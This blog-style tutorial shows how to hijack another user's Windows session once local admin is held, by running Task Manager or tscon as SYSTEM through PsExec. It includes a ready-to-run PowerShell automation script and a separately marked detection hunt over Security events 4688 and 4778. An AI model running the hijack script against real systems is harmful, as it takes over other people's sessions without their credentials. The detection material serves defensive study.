While watching one of John Hammond’s YouTube videos, I stumbled across a really interesting discussion about session hijacking when you already have local administrator access. It wasn’t about some wild zero-day or complex exploit, but instead showed how everyday privileges can be used in ways people don’t always think about.
What stood out to me was just how powerful local admin access really is. The video walked through how that level of access can interact with active user sessions, which is something that’s easy to overlook. It was a good reminder that a lot of security issues come from misunderstood basics rather than advanced attack techniques.
In the demo, they used standard system tools to take over an existing user session. Normally, doing that as an ordinary administrator prompts for the target user's password. But when the same tool runs as SYSTEM, which a local administrator can arrange with PsExec, that prompt never appears and the session is simply taken over.
Here is a short tutorial on how I did this:
Start Task Manager as SYSTEM
- get PsExec from Microsoft Sysinternals
- run the following command:
psexec -i -s taskmgr.exe
- Navigate to the Users tab
- Right-click the user you want to hijack and click Connect
When you click Connect, Windows would normally prompt you for that user's credentials, but because Task Manager is running as SYSTEM it just connects without any prompt.
I also threw together a quick PowerShell script to automate this.
To make this script work you will need the Base64 string of the PsExec binary, which I left out of this guide because it would make it too bloated.
If you already have PsExec on your PC, just change the file path in the $filename variable (the script then skips writing the file):
$filename = "C:\Windows\Temp\psexec64.exe"
# Get the ID and security principal of the current user account
$myWindowsID = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($myWindowsID)
# Get the security principal for the Administrator role
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator
# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole)) {
    # We are running "as Administrator" - nothing to do
    Write-Host "> Already Admin..."
}
else {
    # We are not running "as Administrator" - so relaunch this script elevated (UAC prompt)
    $newProcess = New-Object System.Diagnostics.ProcessStartInfo "PowerShell"
    # Pass the current script path with -File so paths containing spaces still work
    $newProcess.Arguments = "-ExecutionPolicy Bypass -File `"$($MyInvocation.MyCommand.Definition)`""
    # The "runas" verb only works through ShellExecute (PowerShell 7 defaults this to $false)
    $newProcess.UseShellExecute = $true
    # Indicate that the process should be elevated
    $newProcess.Verb = "runas"
    # Start the new process
    [System.Diagnostics.Process]::Start($newProcess) | Out-Null
    # Exit from the current, unelevated, process
    exit
}
$psexecBase64 = "< PSexec base64 string >"
function query-UserSessions {
    $Computer = $env:COMPUTERNAME
    $Users = query user /server:$Computer 2>&1
    # Turn the fixed-width "query user" output into CSV: drop the ">" marker of the current
    # session, fill the empty SESSIONNAME column of disconnected sessions with a placeholder,
    # collapse runs of two or more spaces into commas, then remove the placeholder again
    $Users = $Users | ForEach-Object {
        (("$_".Trim() -replace ">" -replace "(?m)^(\S+)\s+(\d{1,2}\s+\w+)", '$1  none  $2' -replace "\s{2,}", "," -replace "none", $null))
    } | ConvertFrom-Csv
    foreach ($User in $Users) {
        # The header names are localized (USERNAME/BENUTZERNAME, SESSIONNAME/SITZUNGSNAME,
        # STATE/STATUS), so address the columns by position instead of by name
        $col = @($User.PSObject.Properties.Name)
        [PSCustomObject]@{
            ComputerName = $Computer
            Username     = $User.($col[0])
            ID           = $User.($col[2])
            SessionState = ($User.($col[3]) -replace '^Disc$', 'Disconnected')
            SessionType  = ($User.($col[1]) -replace '#', '' -replace '[0-9]+', '')
        }
    }
}
# Query the logged in users
query-UserSessions | Select-Object -Property Username, ID, SessionState | Format-Table
$hijackSessionID = Read-Host "ID to hijack"
# Write the embedded psexec binary to disk unless it is already there
if (-not (Test-Path $filename)) {
    $bytes = [Convert]::FromBase64String($psexecBase64)
    [IO.File]::WriteAllBytes($filename, $bytes)
}
# Run tscon as SYSTEM inside our own session (-i <id>) so the target session is attached to
# the session we are sitting in (/dest); because the caller is SYSTEM no password is requested
$mySessionID = (Get-Process -Id $PID).SessionId
Start-Process -FilePath $filename -ArgumentList "-accepteula -i $mySessionID -s tscon.exe $hijackSessionID /dest:$env:SESSIONNAME" -Wait
pause
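On the defensive side, the hijack above leaves a recognisable trail: a Security event 4688 (process creation) for tscon.exe whose subject is SYSTEM (an administrator running tscon under their own account would be prompted for a password and would appear under that account), followed shortly by a Security event 4778 (session reconnected) for the hijacked user. The following PowerShell is an added example and is not part of the original post or of the script above. It assumes "Audit Process Creation" with command-line logging is enabled; the function names are hypothetical and the sample events at the bottom are constructed for this demonstration.

```powershell
# Added example (not from the original post): hunt for SYSTEM-driven tscon session hijacks.
# Signals: Security 4688 (tscon.exe started by SYSTEM) followed by Security 4778 (reconnect).
# Assumes process-creation auditing with command-line logging; function names are hypothetical.

function ConvertFrom-SecurityEvent {
    # Flatten a Get-WinEvent record into an object with named EventData fields, so the
    # matching below works on field names (NewProcessName, AccountName, ...) rather than
    # on the locale-specific message text.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $xml  = [xml]$Record.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [PSCustomObject]@{ Time = $Record.TimeCreated; Id = $Record.Id; Data = $data }
    }
}

function Find-TsconHijack {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds = 60
    )
    $reconnects = $Events | Where-Object Id -eq 4778
    foreach ($e in ($Events | Where-Object Id -eq 4688)) {
        # tscon.exe running as SYSTEM is the signature of the no-password path:
        # an interactive admin would show up under their own account here.
        if ($e.Data.NewProcessName -notmatch '\\tscon\.exe$') { continue }
        if ($e.Data.SubjectUserName -ne 'SYSTEM') { continue }
        # Pair the launch with the first session reconnect inside the time window
        $follow = $reconnects | Where-Object {
            $_.Time -ge $e.Time -and ($_.Time - $e.Time).TotalSeconds -le $WindowSeconds
        } | Select-Object -First 1
        [PSCustomObject]@{
            Time            = $e.Time
            CommandLine     = $e.Data.CommandLine
            ReconnectedUser = $(if ($follow) { "$($follow.Data.AccountDomain)\$($follow.Data.AccountName)" } else { $null })
        }
    }
}

# Live use (elevated shell), last 24 hours of the Security log:
# $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688, 4778; StartTime = (Get-Date).AddHours(-24) } |
#           ConvertFrom-SecurityEvent
# Find-TsconHijack -Events $events | Format-Table -AutoSize

# Constructed sample: a SYSTEM tscon launch, a reconnect of "alice" 5 s later, and a
# later tscon run by an administrator under their own account (not flagged by this rule).
$t0 = Get-Date '2024-01-01T10:00:00'
$sample = @(
    [PSCustomObject]@{ Time = $t0; Id = 4688; Data = @{
        SubjectUserName = 'SYSTEM'; NewProcessName = 'C:\Windows\System32\tscon.exe'
        CommandLine = 'tscon.exe 2 /dest:console' } }
    [PSCustomObject]@{ Time = $t0.AddSeconds(5); Id = 4778; Data = @{
        AccountName = 'alice'; AccountDomain = 'CORP'; SessionName = 'Console'; ClientName = 'WS01' } }
    [PSCustomObject]@{ Time = $t0.AddMinutes(10); Id = 4688; Data = @{
        SubjectUserName = 'bob'; NewProcessName = 'C:\Windows\System32\tscon.exe'
        CommandLine = 'tscon.exe 3' } }
)
Find-TsconHijack -Events $sample | Format-Table -AutoSize
```

Run against the constructed sample this reports one hit, the SYSTEM launch at 10:00:00 paired with CORP\alice. If the environment ships Sysmon instead of 4688, the same logic applies to Sysmon event 1 with its Image and User fields; the SYSTEM-as-subject condition is the part that separates the no-prompt hijack from an administrator who typed a password.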